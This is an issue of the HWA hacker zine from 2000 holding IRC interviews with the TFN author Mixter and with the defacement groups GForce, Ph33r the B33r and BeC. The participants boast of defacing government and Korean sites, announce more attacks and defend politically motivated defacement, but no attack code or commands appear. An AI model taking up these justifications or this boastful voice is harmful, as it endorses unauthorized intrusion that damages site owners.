man that was supposed to be an "interview" with guys from DeC they know shit couldnt answer simple questions scrolled ascii and just said shit like HWA IZ GAY AN WE IZ GR8 rofl sigh sad totally two of em said two different names lol that was a hilarious interview gonna edit it now brb IRC log ended Tue Aug 1 17:06:24 2000 ---END--- Special thanks to jeemjones who pointed out they were taking the piss, I never would have guessed all by myself tnx jj!, i put up with this drivel on occasion and sometimes even listen... who knows someone may say something intelligent one day.. - Cruci @HWA 325.0 [HWA] Interview: Mixter by Cruciphux (NOT SugarKing) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ (c) 2000 by HWA-Security please credit http://hwa-security.net as source if you use any part or all of this transcript. Thanks Mailto: media@hwa-security.net Cruciphux/HWA Note: Originally published in HWA.hax0r.news issue #53 http://welcome.to/HWA.hax0r.news Mixter http://mixter.warrior2k.com/ Cruciphux http://welcome.to/HWA.hax0r.news/ Mixter is the author of TFN (Tribe Flood Network) software which was recently brought into the limelight by Mafiaboy who used a variant called mstream to attack some big name web sites and effectively shut them down for several hours. -> -> Technical Overview: -> -> See Packetstorm http://packetstorm.securify.com -> http://packetstorm.securify.com/papers/unix/tfn.analysis.txt -> -> Analysis of the "Tribe Flood Network", or "TFN", by Mixter. -> TFN is a powerful distributed attack tool and backdoor currently -> being developed and tested on a large number of compromised -> Unix systems on the Internet. -> Sunday afternoon May 21st 2000. [ For the most part un-edited so you can decide what is ] [ interesting and what isn't, general chatter has been ] [ removed and hostnames blanked out. ] ***** ADDENDUM/CORRECTION *************************************************** [ NOTE: I was incorrectly under the assumption at the time of this interview that Mafiaboy used Mixter's code to do his DDoS damage, this turned out to be false, in fact mstream (discussed elsewhere with source code) was used and NOT TFN. My apologies for the inaccuracies. - Cruciphux ] ****************************************************************************** Session Start: Sun May 21 13:13:43 2000 Session Ident: Mixter (mixter@*.net) [13:19] what inspired you to write the TFN software? [13:20] what where your goals, thoughts, intended uses [13:20] : [13:20] hmm [13:20] well, I coded it for the same purpose I code everything, because I simply like coding, and now or then you'll create something important [13:21] if not, coding something is always a new excercise for yourself... [13:21] you could code something but still not release it publically, was it merely POC or did you expect it to be used? [13:22] I've heard about these tools on irc like two years ago, at least that people wanted to create them [13:22] POC=? :) [13:22] sorry I spend way too little time in usenet etc. [13:22] Proof Of Concept [13:22] np [13:22] o [13:23] no, the first version was just a nice powerful tool to write up [13:23] what is your view on the Mafiaboy debacle and how do you feel about your software being used to attack major web sites? [13:24] it was interesting to see this concept worked, and you could contact hosts at a fast speed and with tunneling through raw packets and all [13:24] tfn2k, was however a pure POC.. any kiddie who tried to use it will know how buggy it is :) [13:25] can you explain the concept to us and how it works? [13:25] I think, when the government and media forces need something to puff out, they'll always find something [13:25] if it wasnt for the dos attacks, it wouldve been something else [13:26] I believe all packet kiddies out there should get a life... but they do more damage to irc servers and users than anything else, though [13:26] true but it was you that made the tool available, they may not otherwise have decided to attack these sites [13:27] do you feel responsible at all? [13:28] the plain concept of distributed attacks is to start processes from a lot of hosts, simple as that. in distributed packet flooding, you launch all processes against a single target. theoretically, before all the tools came out, when people just logged on to a lot of shells and run their udp/syn flooders against 1 target, that was the same stuff. what the new programs do, raw tunneling, or encrypted tcp control connections are just feature improvements to the same [13:28] that they have a big impact on feasibility and speed of distributed attacks and other things like distributed scanning [13:28] hm ok :) [13:29] its important to realize that the "authorities" biggest instrument is false guilt [13:30] people can't withdraw from it, and if they do, they're still being persecuted.. so I believe that people like mafiaboy arent innocent since they knew what they were doing, but simply sitting in front of your home computer and typing in commands can hardly make you a "criminal" [13:31] would you extend that view to "hacking" also? [13:31] whats your view on people who deface websites? [13:32] if you talk about hacking as in breaking into servers, I have no ethical problems with it as long as it is for the cause of improving the security, e.g. patching and/or notifying the people [13:33] so you are ok with non destructive intrusion so long as you patch the hole you came in through? [13:33] website defacements in general are destructive, because they can harm companies by destroying their images.. so it isnt something people should do.. exceptions are of course sites that stand for violation human and individual rights [13:33] what if the system is borrowed to say, host a bot on irc or launch further intrusion attempts? [13:34] yes I personally believe that socio-politcal defacements with a valid message are justifiable [13:34] well, I DONT recommend intrusion at all in these big brotherish times, it's far more easy to do productive, legal work, by working for a company or founding your own one, but lets say I have no problem with it, if no damage is created [13:35] what other software are you working on presently? [13:35] if they hack systems to host a bot, that's a pretty clueless and dangerous way... if they HAVE to intrude or if they dont have the small money, the only acceptable way is to contact the administration, notify them of the problem and ask for resources in exchange for securing their site [13:36] yeah.. it's pretty lame though, when you see some anti-human-rights site defaced, and you have in black on gray one line of text that says "pr0pz to muh brothers of the gibson h4xing cl4n" [13:36] ;/ [13:37] considering the little cost involved in offering a hacker system resources in exchange for securing a server it seems strange it doesn't happen more often [13:37] well, security software, auditing software and more.. the problem is I can't disclose that without permission from my employees, and I wouldn't break my agreement [13:37] err employers [13:38] you currently are employed in the security field, were you ever a grey-hat? [13:38] i suppose thats a round about way of asking if you have hacked yourself in the past [13:38] yes it does.. but the whole thing is based on trust, and if it would become practice that hackers outline vulnerabilities and then get local access (from where they have LOTS of insider attacking possibilities), most people would have a problem trusting them [13:39] heh.. well yeah, I broke into hosts without permission in the past [13:39] trust is earned however and the notification of intrusion would be a demonstration of intent [13:39] at the beginning of my carreer, I started out with developing eggdrop/tcl (not for takeover, just for defense and fun for the most part) [13:39] how old are you? [13:40] that was 2 1/2 years ago.. I hadn't a clue about the legal issues back then, and wasn't even certain if what I was doing is illegal [13:42] ah, the notification of intrusion could also be used as a social engineering (<- stupid term :P) method, to get the trust, and then attack them from the inside with their consent :> [13:42] how did you get into computers? what was your intial exposure? first machine? [13:43] no, I don't care about that, after about 50 news agencies published name, address, birthdate, and photos of me back in february :P [13:43] k [13:45] how did you get into computers? what was your intial exposure? first machine? [13:46] my initial exposure was a c64 I used when I was about 6-8 yrs old [13:46] i programmed a lot in basic, some machine language later :) [13:47] Are you self taught or do you have any official schooling in programming etc? [13:47] if people wouldnt all start with big PC OS's like windows, they'd probably figure out programming and the ins and outs of computing much better and faster... [13:47] yeah I started on a vic-20 [13:47] wrote a bbs on it [13:47] it had 4k ram [13:47] oh well, the nice feds took away my computer back in 98 [13:48] for what? [13:48] i hadnt had a pc for 3 months, that was when I read awful lots of programming, networking etc books and really got into the technical aspects [13:48] for installing some bots on a couple of hosts :] [13:48] *g* [13:49] thats about it really, thanks for yer time, any closing comments? [13:49] hey, nobody's perfect. I really *was* clueless about the tracing stealthing etc aspects of hacking, leave alone the legal stuff back then.. just exploring and doing anything I could :) [13:49] :-) [13:49] nope, if you dont have any closing questions ;) [13:49] when I sold my first c64 system, the guy that bought had nagged and nagged me [13:50] hehe [13:50] for some phreaking software i had, I finally gave in and let him have it warning him not to [13:50] actually use it unless he learned how it worked etc [13:50] he called me a week later [13:50] phreaking is something nice.. I really wish I could've done it in the time and/or country when it was feasible and not too dangerous [13:50] he was busted and had the $750 system confiscated [13:50] :) [13:51] aw :) [13:51] I was into it when I was younger [13:51] it was fun [13:51] i spent $3000 on my first PC [13:51] yeh same here [13:51] the one that got confiscated ;x [13:52] I paid $900 for a used 9M hard drive for my c64 bbs and $1000 for the USR 9600 external modem [13:52] heh [13:54] funny thinking about a 9 megabyte hard disk these days, it was the size of a ups [13:55] actually it might have been 7M [13:55] anyways we're all done i'll ttyl - thanks Session Close: Sun May 21 13:55:44 2000 END @HWA 326.0 [HWA] Interview: back to business, political hackers GForce by SugarKing ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ You have seen the high profile sites on Attrition that have been defaced by GForce, SugarKing from HWA Staff interviews GForce members for a closer look into why they do it. (c) 2000 by SugarKing/HWA-Security please credit http://hwa-security.net as source if you use any part or all of this transcript. Thanks Mailto: media@hwa-security.net Cruciphux/HWA [ Session Start - slightly edited ] [20:59] SugarKing: So we can start the interview ;) [20:59] sure [20:59] alright, is this everyone you want present? [21:00] yes, most of other guy's arn't on, some are busy, and it's very early here. [21:00] yeah [21:01] ok, you don't have to answer any question if you don't want to... [21:01] ok [21:02] so lets begin:) [21:02] yep [21:02] ok first off, how many members are there, and who are they? [21:03] *** sniper- is now known as sniper__ [21:03] ehehe [21:03] heh [21:03] services sux [21:03] There are about 5 members, they are myself, miller, rave-, heataz, and instinct atm [21:03] ok [21:04] when was the group founded and by who? [21:04] It's was founded about a year ago, and by myself, heataz and miller [21:05] what was your sole purpose of starting the group? for the reasons you name in your defacments? [21:06] GForce was born out of hate and contempt for violence, atrocities and human rights violations against Muslims, specially the affectees in Kashmir [21:06] t was precipitated to bring the attention of world leaders and organizations to the issue in cyberspace which is today the leading source of communication. The motive behind the formation of the group was to create global awareness about kashmir. [21:06] which members are actually from Pakistan? [21:07] if any [21:07] we focus on kashmir, basically. [21:07] so nobody is actually from kashmir? [21:07] well i`m from pakistan, othger's would like to stay anonymous please. [21:08] well no one if from kashmir. [21:08] sure, np [21:08] =) [21:08] some of your defacements are gov servers, any reason of targeting gov's, are you afraid to get busted? [21:09] Not really, We are not afraid to get busted for the reason that it's a good cause, secondly members are out of the feds reach ;) [21:10] yeah of course [21:11] you are one of, if not the only, people on attrition that I've seen that actually have a REASON [21:11] instead of just "I 0wn j00" [21:11] :) [21:11] *** snipah- (**************) has joined #gforce [21:11] sory i got disconnected. [21:11] US government was targetted because 1) more people view .gov's and we can do a good job in achieving th goal, we are out for. 2) We're a big angry :) [21:12] big=bit [21:12] *** sp1n sets mode: +o snipah- [21:12] and it seems like you guys got some skill, seeing you don't really do any NT hacks [21:12] *** rpcb1nd (***************) has joined #gforce [21:12] *** sk0l (*****************) has joined #gforce [21:12] *** sp1n sets mode: +o rpcb1nd [21:12] *** sp1n sets mode: +o sk0l [21:13] i`m glad we don't do NT, [21:13] we are supported by a study group known as hexa labs [21:13] what is hexa labs [21:13] ? [21:13] Plus every member can code (usefully) [21:14] hexa labs is a study group, they find out vulnerabilities, code them (we help code) [21:14] most of it is being kept private. [21:14] *** sniper__ has quit IRC (Ping timeout) [21:14] you guys ever use your own exploits when using them on defacing? [21:15] *** sk0l sets mode: +l 14 [21:16] [rave-:#gforce PING] [21:16] ehhe [21:16] alot of times we use own exploitz [21:16] heh [21:17] sometimes we use a wuftp (b0f rulz) and bind.. but no details [21:17] yeah b0f rules [21:17] :) [21:17] :) [21:17] what do you guys think about ./hack kiddies on attrition like the Crime Boys? [21:18] *** snipah- has quit IRC (Ping timeout) [21:18] oh [21:18] we dont apreciate it, we think about just kids who dont know what to do. [21:19] who thinks about computer hacking/security is just get proggies from others dudes and exploit of Dos something [21:19] we think about computer security is a big culture and need to dedicate to it, studys, tests, and fucking blowing head [21:19] eheh [21:20] crimeboys is very poor [21:20] NT hackewrs [21:20] yeah I agree [21:20] are most of you guys teengagers? [21:21] i dunno about sniper but i have 20 yrs old [21:22] *** sniper__ (***************) has joined #gforce [21:22] wb [21:22] *** rave- sets mode: +o sniper__ [21:22] thx [21:22] so why do you think India is solely responisible for this ordeal in Kashmir? [21:24] *** rpcb1nd sets mode: +l 13 [21:24] because they are, 1) they are pretty lame as they don't wana listen to any one, the people want freedom but India won't let them to add to all this they rape innocent women, small children get murdered, made orphans. and they violate human rights [21:25] *** sp1n sets mode: +l 14 [21:26] nod [21:26] pretty violent [21:27] yep. [21:27] you guys plan on keep defacing and protesting till someone gets busted? [21:28] not sure, but yes we will be defacing for some while. ;) [21:28] what do plan on accomplishing by defacing on this issue? [21:29] to get people to realize the situation ? [21:29] yep, create global awareness, on many occasions people have asked us if kashmir is some one like kevin mitnick =) [21:30] obviously they 'kashmir' is some guy [21:30] hahah [21:31] they thought even. [21:31] any last comments/shout outs?:) [21:32] =] [21:33] yes [21:34] shoot:)\ [21:35] I`d like to thank mos (muslim online syndicates) for what ever they have done, Pakistan Hackers club, hexa labs for coding, attrition, munge, punkis, null, mcintyres, jerisho for fast mirroring, zillion@safemode , rr, cen, and all in @linuxsex [21:35] oh and #darknet@efnet ;) [21:36] last shouts to hwa security ;) [21:37] hah nice, thanks for the interview:) [21:37] ah, np [21:39] [rave-:#gforce PING] END @HWA 327.0 [HWA] Interview: Ph33r the B33r by SugarKing ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ (c) 2000 by SugarKing/HWA-Security please credit http://hwa-security.net as source if you use any part or all of this transcript. Thanks Mailto: media@hwa-security.net Cruciphux/HWA Note: Originally published in HWA.hax0r.news issue #53 http://welcome.to/HWA.hax0r.news Exclusive interview by HWA staff writer SugarKing Contact him at: sugaking@gis.net Or editor at: cruciphux@dok.org Session Start: Thu May 04 21:15:55 2000 [21:15] *** Now talking in #vivalaresistance [21:16] lets do this [21:16] lock the channel [21:16] no one knows of it [21:16] i cant [21:16] lol [21:16] ok [21:16] heh [21:16] one sec bro [21:16] werd [21:16] talking to a chick on the phone:) [21:17] heh [21:17] hurry mon aint got much time [21:17] alright [21:17] logging now [21:17] aight [21:17] you guys don't have to answer anything [21:17] just say no comment:) [21:17] iight [21:17] wtf [21:17] heh [21:18] Whats up? [21:18] Yo we gonna start? [21:18] so how long has ph33r the b33r been a group? [21:18] we're already starting:) [21:18] well [21:18] Ok : ) [21:18] i recruited people from the early october [21:18] so lets say october [21:18] ok... [21:18] I joined probably in december or november [21:18] Which one was it p4ntera? [21:18] november [21:19] k [21:19] so you started the group, p4ntera? [21:19] yes [21:19] any reason? [21:19] well [21:19] and what's with the name? [21:19] because there wasn't much action going around in the underground [21:19] LoL [21:19] that name is joax [21:19] so [21:19] i wanted people to know the "scene" aint dead [21:19] the name? [21:19] lmao [21:19] well its a LONNNG story [21:20] Very long [21:20] heh [21:20] yeah [21:20] he told me once [21:20] Dont wanna hear it again [21:20] u still wanna hear it? [21:20] nah that's ok [21:20] save some time [21:20] yeah [21:20] so how many members to date? [21:20] holy shit [21:20] loll [21:20] 14+ [21:20] 15? [21:20] most are just shadow members [21:20] who remain in the background [21:20] Yah [21:21] Wait let me think [21:21] Yah 15 or 16 i can remember [21:21] that's alot [21:21] yeah [21:21] u guys know how many sites you've defaced so far? [21:21] next? [21:21] another holy shit =) [21:21] i would say 20+ [21:21] LoL [21:21] or don't keep count? [21:21] 20+? [21:21] yeah [21:21] I would say 40 [21:22] And many more to come [21:22] just guessing [21:22] heh [21:22] well [21:22] i dont wanna sound cocky [21:22] =) [21:22] why do you guys deface? fame? [21:22] nah [21:22] well i like to show people the underground aint dead [21:22] and well [21:22] some for fame too [21:22] but not all [21:23] what do you mean "the underground aint dead"? [21:23] Yah i agree [21:23] hence why we havent defaced the higher up sites [21:23] well [21:23] look on attrition [21:23] mostly frontpage kiddies, or brazilian kids who cant speak [21:23] english [21:23] or both [21:23] hah ya [21:23] MSADC GALORE [21:23] i say the 2 go together in the same sentence [21:23] HAHA [21:23] da_pest, dont even give em that =) [21:23] lol [21:23] Tru dat [21:24] hah [21:24] next? [21:24] you guys afraid of being busted? [21:24] hell yeah [21:24] Of course [21:24] i dont wanna have a friend named backdoor billy [21:24] then why do you keep defacing? [21:24] well [21:24] You think i want bull shit on my record lol [21:24] we're in it now [21:24] we can't stop [21:24] plus i dont wanna [21:25] ya you can [21:25] I did [21:25] don't wanna? why? [21:25] i cover my tracks well, and i hide myself [21:25] i like defacing [21:25] Plus we said we are afraid of gettin caught but i personally enjoy the rush of the chance of getting caught [21:25] same [21:25] :) [21:25] hes right [21:25] what about ethics? [21:25] well [21:25] i did it for awhile [21:25] i rarely do medical sites [21:26] but i don't think it's right [21:26] not needed [21:26] no msadc [21:26] eh [21:26] heh [21:26] and usually if i feel sorry for the admin [21:26] i give him the patch [21:26] if you feel sorry? [21:26] I think its safe to say NT will be out of PTB for a bit eh p4ntera? [21:26] haha [21:26] thats right [21:26] but now we're going for countries [21:27] Oh yah [21:27] countries? [21:27] as you might have saw, we raped korea pretty bad [21:27] =) [21:27] ya i noticed a bit [21:27] yeah [21:27] Yah' [21:27] next is a country that everyone hates [21:27] we plan to finish it up tommorow (korean sites that is) [21:27] Yah [21:28] what about others calling you guys script kiddies and indeed having script kiddies as members [21:28] We gonna clean up the .kr tomorow eh p4ntera? [21:28] well [21:28] not to name any *cough*artech*cough* [21:28] :) [21:28] lets not get into artech [21:28] Ok artech [21:28] I d liek to say something about him [21:28] i consider a script kiddie someone who uses scripts and not knows what it actually does [21:28] sorry like [21:28] go ahead:) [21:28] Ok [21:28] He is basically a frontpage KIDDY [21:28] yeah [21:29] yeah I noticed [21:29] aol kiddie [21:29] he doesnt even know what NTLM authentication is [21:29] or [21:29] how he uses the everyone/guest group to hack with frontpage [21:29] he just randomly tries sites [21:29] He dissed p4ntera and I meanwhile we have our own ideas of hax0ring whil he does absolutly frontpage [21:29] which is pretty fucking lame [21:29] Ok [21:29] Go on attrition [21:29] and look at his hacks [21:29] Im pretty sure every one of them is NT [21:29] nah thats not important [21:29] yeah they are [21:29] lets move on to something else [21:29] i don't think he knows what linux is [21:30] NT can be raped other ways [21:30] Yah [21:30] as u saw with what i did [21:30] But he uses only frontpage [21:30] yeah [21:30] Yep [21:30] that is correct [21:30] how many memebers code? [21:30] netbios is a weak fucking protocol [21:30] well [21:30] LoL [21:30] 5-8 [21:30] Very very weak [21:30] you guys plan on releasing any exploits you may have written? [21:30] yeas [21:30] very soon [21:30] Yep [21:30] we are probably gonna release some scanners [21:30] then maybe some exploits [21:30] Yeah [21:30] cool [21:31] depends how much sexor i get in the next few days [21:31] hah [21:31] LoL [21:31] You know ill be getting sex0r from 3r1/\/ lol [21:31] so all members are generally kids? 15-18? [21:31] yeah muthafuckas [21:31] =) [21:31] no [21:31] lol [21:31] we have some universty members [21:31] but none too old [21:31] none too young [21:31] oh [21:31] around your difference [21:31] as u said [21:32] what are you guys trying to prove by defacing? [21:32] anything? [21:32] like i said [21:32] the underground aint dead [21:32] and [21:32] that we, as kids, will not take the bullshit the media spews forth [21:32] about hackers and the like [21:32] yeah [21:33] Yep [21:33] hmm [21:33] I dont like the stereo types [21:33] do you guys have a site? [21:33] not yet [21:33] we will have one, one of our members needs 2 way cable [21:33] :P [21:33] www.b33r.com soon [21:33] heheh cool [21:33] Plus we dont even really need one as of this monet [21:34] moment [21:34] ya [21:34] errr..... [21:34] do you guys plan on ever stop defacing? [21:34] Me No! [21:34] Well not for a while at least [21:35] p4ntera? [21:35] He is afk [21:35] oh [21:35] he is walkin his dog for a sec [21:35] hah ok [21:35] He will brb [21:35] :) [21:35] i hate dogs [21:35] they're Pest's:P [21:35] Why? [21:35] Like me : ) [21:35] ya [21:36] I lub puppys [21:36] :) [21:36] U gots any other questions? [21:36] ya, i'm waiting for p4ntera though [21:36] Oh ok [21:37] *** p4ntera has quit IRC (Ping timeout) [21:37] hrm [21:37] he'll be back [21:38] Yah [21:38] so do you use different handles on IRC because you're afraid of getting caught? [21:38] Not so much getting caught just the fact i dont want to be bothered [21:39] I dont want some kid to see my defacements and bug me on irc [21:39] ya [21:39] how'd you meet p4ntera? [21:39] but partly because of the illegal activities factor = [21:39] Honestly we live about a few blocks away from eachother [21:40] hah cool [21:40] Yah [21:40] do you guys talk about your defacements and shit in school? [21:41] Well we dont have any of the same classes!But if something big is goign down we meet in between classes just to enlighten eachother kinda [21:41] Shit sorry for my spelling [21:41] Im just really cold [21:41] do your friends know that you guys are into computers? [21:41] heh [21:41] it's aight [21:42] Umm... Well some do but I dont think any know im into defacing [21:42] Me and p4ntera are the only ones out of my cru that are into this shit [21:42] ya [21:43] same as me and Clientel [21:43] cool [21:43] we have one class together and he doesn't shut the hell up [21:43] LoL [21:43] What does he talk about? [21:44] about his elite defacements [21:44] haha nah [21:44] brb man im gonna log on a nother server im lagged [21:44] he talks about computers in general [21:44] *** Da_Pest has quit IRC (Quit: Hey! Where'd my controlling terminal go?) [21:44] aight [21:45] *** Da_Pest (****@********.***) has joined #vivalaresistance [21:45] Back! [21:46] ok [21:46] where the hell is p4ntera? [21:46] He walking his damn dog [21:46] i'll kill it [21:46] Sorry bout the wait [21:46] LoL [21:46] he should be here soon [21:47] ok [21:47] sorry for the wait [21:47] np [21:48] do u code? [21:48] yup [21:48] btw, to set the record, since i'm logging and it's going to be posted [21:48] I left this group because it was only defacing [21:49] I didn't want to do it no more [21:49] Ok... [21:49] I'll keep my opinion about defacing to myself [21:49] Why not? [21:49] but, I'd rather code some nasty shit:) [21:49] ok gitcha [21:49] Alot of people dont like defacing [21:50] But the way I see it... [21:50] I don't see a need for it [21:50] If you work fucking hard on a tight ass OBSD server and you been workin on it forever then I think you deserve the credit and so people can see your work [21:51] *** p4ntera (****@****.*********.******.***.***) has joined #vivalaresistance [21:51] wb [21:51] dog walker:P [21:51] thanks [21:51] sorry about that [21:51] hah [21:51] Yah wb [21:51] yeah man your mom is rough with the leash [21:51] she keeps on bitin git [21:51] loil [21:51] *biting it [21:51] anyways [21:51] =) [21:51] back to the question [21:51] do you guys plan on ever stop defacing? [21:51] yeah anyways [21:51] maybe [21:51] when some of us gets booked [21:52] or we own the world [21:52] LoL [21:52] which ever one comes first [21:52] heh [21:52] Me never I wont stop [21:52] yeah he well [21:52] *will [21:52] I enjoy it [21:52] i would just like to add something? [21:52] if thats alright? [21:52] go ahead [21:52] you got the floor:) [21:52] I will never stop hax0ring and if i do good work thhen I believe it should not go unnoticed [21:52] you asked whats with the "underground aint dead part" [21:52] ya [21:52] well [21:52] if u noticed last year [21:53] groups like gH,irc.psychic.com and h4g15 were defacing major websites [21:53] ya [21:53] showing there weak security [21:53] now we got people like "crime boys" and artech defacing websites [21:53] Exactly [21:53] and these are the people that will protect potentially high up websites? [21:53] i dont want my bank card protected by these frontpage kiddies [21:54] Ok course [21:54] u know what i mean? [21:54] yah [21:54] and the sad part is alot of admins are like that [21:54] true in a sense [21:54] yeah thats right they are [21:54] And i mean alot [21:54] but what about groups like L0pht, who made their fame without defacing? [21:54] well [21:54] they were made in the 80's [21:54] Like look at all of artechs for god sakes [21:54] when defacing was unheard of [21:55] bbs hacking [21:55] what about now? [21:55] they did do the potentially "dark" side of hacking [21:55] they could easily deface now [21:55] yeah but they outgrown that [21:55] its kind of a teenage thing [21:55] so you saying you're gonna outgrow it? [21:55] fuck when i heard mosthated was 19 i was shocked [21:55] eventually [21:55] heh [21:55] ya [21:56] I dont think I will [21:56] until i get booked [21:56] yeah he will [21:56] heh [21:56] anyways [21:56] Umm... [21:56] No [21:56] in my last interview (team echo) one member said (remain nameless) hacking is something that just eventually progresses [21:56] yeah [21:56] which is true [21:56] funny thing is [21:56] Tru dat [21:56] we have 2 members of team echo [21:56] in our group [21:56] nameless of course [21:56] ya I know [21:56] hehe =) [21:56] well, had [21:56] had? [21:56] one got booked [21:56] they left? [21:57] who? [21:57] another one is still in [21:57] Analognet [21:57] Analognet was in ph33r the b33r? [21:57] yep [21:57] :) [21:57] dont be so shocked [21:57] i didn't know [21:57] u know who taught him how to hack nt? [21:57] your talking to him right now [21:57] heh [21:57] he learned very fast [21:57] p4ntera is truly 1337 sh1t lol [21:57] within a month he knew what i knew [21:57] He taught me alot [21:58] and became a nt admin [21:58] damn right negro [21:58] cool [21:58] =) [21:58] I think as a group we are progressing [21:58] i totally agree [21:58] 100% [21:58] so anything we should know about with the future of ph33r the b33r? [21:58] yeah [21:58] We are slowly moving are way up to bigger and better things [21:58] we are going to be big [21:58] as da_pest is saying [21:59] And eventually we are gonna pull a gH and own a big ass site [21:59] we are the only thing that comes close to a good group [21:59] of course [21:59] And that will be a grand finale [21:59] my boys wkD are there with us [21:59] Yah [21:59] oh yeah also...don't you think it's dangerous by just randomly pulling in people in the group who could possible be a fed? [21:59] werd ka0x and BlazinWeed =) [21:59] no [21:59] i know my rights [21:59] too well in fact [21:59] Same [21:59] entrapment is a beautifal thing my friend [21:59] =) [22:00] Plus we make sure people are legit before they join [22:00] and thats why we hang on lame networks [22:00] any last comments? shout out's? flames? [22:00] cause efnet is like 98% sniffed [22:00] well [22:00] i would like to say to sinfony, aka john dough [22:00] lol [22:00] DIE [22:00] that i respect his skills [22:00] i recently found out he is r3p3nt from dhc, which kinda sucks for me [22:00] because i respect dhc as a group [22:00] and him especially [22:01] even though he flamed us [22:01] he has his skills [22:01] but he is still a ass [22:01] that will likely never change [22:01] hehe :) [22:01] heh [22:01] anything from you, Pest? [22:01] He is a bigger ass then m4rth4 lol [22:01] Yah i just gotta say look out bitches cause PTB Is climbing our way up [22:01] heh [22:02] And soon we will not be able to be touched [22:02] i would like to say some more as well [22:02] that is right [22:02] these 3rd world countries are our playgrounds [22:02] once we master our abilities, we are coming for the higher ups [22:02] Yah [22:02] that it?:) [22:02] once we recruit some more members, we are coming [22:02] you cannot stop it [22:02] no one can =) [22:02] Oh Yah [22:03] and [22:03] i would like to say [22:03] Sugarking is one sexy cum muffin [22:03] =) [22:03] hahah [22:03] thanks for the interview d00dz [22:03] ok [22:03] heh [22:04] *** Da_Pest has quit IRC (Quit: Hey! Where'd my controlling terminal go?) Session Close: Thu May 04 22:04:39 2000 END @HWA 327.1 [HWA] Interview: BeC some oldskewl muscle makes some noise.(additional feature) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Interview with BeC by Cruciphux Oct 2000 This is an interview with kR_d of the fledgling hacking outfit known only as BeC (Binary Equipment Corporation) based on DeC since that machine was prevelant in the move Takedown (not released here in Canada at this time). It was conducted across a few days in parts and assembled here with the lesser interesting parts and chit-chat removed. One site recently (and curiously STILL defaced) by BeC was the quantum physics lab (?) at wesleyan edu.: http://quantum.phys.wesleyan.edu/ As far as I know it has not been listed on Attrition nor even noticed apparently by the admins, some other sites were also hit with a similar defacement but as our interviewee tells us BeC is not all about defacing. Interviewed : Kr_D (BeC) Kr_D is a pseudonym since others use his usual nick on irc we altered it for this interview to avoid any confusion. Conducted by: Cruciphux (Informal) http://hwa-security.net/BeC.txt Old school ascii art from the quantum hack: []-=-=_===--=-=--=w00f,-=--=-aND=--=--=_-=gr33tinGs=--=--=-fR0m----=--__=--=-=[] .. R .yHJ^*^ H _._ .C^' _._ `# cYk"^%Hn KH :TGTH) U, .C" .U HD: . ####$$&' K _ KD_,,n#^^"' CD, d' ""^#"' H b^^ccn, #L^'" . "KGg,oY^" J#^' `:5 CD. _,S' o&HD: cH "KKg,oP^" ,h' ^K .k" KD. .gh' [ KrD ] Hysdp' ,uY#L^" .-[m0FF] | [m0FF]-' []-=-===--=-=tH3--=_-=--=b1n4Ry--=--=eQUiPM3n7-=_-=--=-=-=cO0PERA7i0n=--_--=-=[] /SNIP/ Session Start: Sat Oct 28 17:05:18 2000 [17:05] *** Now talking in #INTERVIEW_BeC [§] Channel [ #INTERVIEW_BeC ] Modes [ + ] [17:05] -> *Kr_D* hey [17:06] *** Kr_D (~k0rrupt@213.x.x.x) has joined #INTERVIEW_BeC [17:06] hell0w stevie [17:06] *** [HWA] sets mode: +k werebizzy [17:06] <[HWA]> hewo [17:06] heh [17:06] <[HWA]> how are you today? [17:06] <[HWA]> lets interview [17:06] <[HWA]> :) [17:07] i am very fine indeed [17:07] xept for all thos P-H-O-C-K-E-N [17:07] <[HWA]> firstly i heard you had sex with animals when you were young is this true? [17:07] tcpwrapped boxes [17:07] <[HWA]> just kidding [17:07] <[HWA]> lol [17:07] everywere [17:07] it's true [17:07] how did you know? [17:07] <[HWA]> ok seriously [17:07] <[HWA]> hehe [17:07] ok [17:07] <[HWA]> first why don't you introduce yourself [17:08] Hi, my name is KrD [17:08] and i'm a crackinga ddict [17:08] <[HWA]> then i'll get into questions [17:08] addict even [17:08] <[HWA]> as opposed to a crack addict [17:08] <[HWA]> good [17:08] <[HWA]> [17:08] <[HWA]> what have you cracked recently? [17:08] like, erm.. [17:08] distort it = edit? [17:08] <[HWA]> what nick shall i use for the interview? [17:08] Kr_D [17:08] <[HWA]> no as in take out silly chatter [17:09] <[HWA]> no distortion [17:09] sed -e 's/Kr_D/KrD;w chat.txt' [17:09] <[HWA]> you want to see the copy before it is released? [17:09] sure [17:09] <[HWA]> that is perfectly acceptable. [17:09] so, no #phrack editing shit [17:09] with evil comments [17:09] <[HWA]> no [17:09] and "tounting" [17:09] <[HWA]> no comments [17:09] (i like that word) [17:09] <[HWA]> tounting? is that like taunting only obfuscated? [17:10] yeah [17:10] <[HWA]> whats your opinion of Phrack? do u hang in their channel #phrack on EFNet? [17:10] sometimes [17:10] i like phrack [17:10] they don't like me thou [17:10] <[HWA]> why is that? [17:11] DNS: 213.x.x.x [17:11] dono [17:11] do they like anyone? [17:11] <[HWA]> they certainly don't tolerate vhosts they seem to have now sense of humour [17:11] heh [17:11] <[HWA]> my take is they are elitist ego trippers. [17:11] they have humor [17:11] <[HWA]> comment? [17:11] sarcastic humor [17:11] <[HWA]> yes i laugh at them often [17:11] they are to eleet fro them selfes [17:11] they really are eleet [17:11] <[HWA]> Phrack isn't the same since Bloodaxe left [17:11] but, it's like when, [17:11] er,.. [17:12] yeah, like britney spears [17:12] <[HWA]> Chris Goggins [17:12] look at her before she got famous [17:12] and look at her now [17:12] she has become more rude and stuff [17:12] <[HWA]> i didn't know of her before she was famous [17:12] she thinks she is better then other [17:12] <[HWA]> have you defaced her? [17:12] <[HWA]> :) [17:12] i have defaced her but with something else [17:12] heh [17:13] <[HWA]> honestly i wouldn't mind finding a local root compromise to that snatch [17:13] i mean, like two years ago [17:13] <[HWA]> but i digress [17:14] heh [17:15] <[HWA]> hrm [17:15] ok, [17:15] <[HWA]> what have you cracked recently that is of import and what if any group are you affiliating with? [17:15] * [HWA] trys to steer back on track [17:16] <[HWA]> tries even [17:16] of import [17:16] hmmss.. [17:16] <[HWA]> well any then. [17:16] heh [17:16] <[HWA]> what was you last crack [17:16] <[HWA]> not girl i mean site 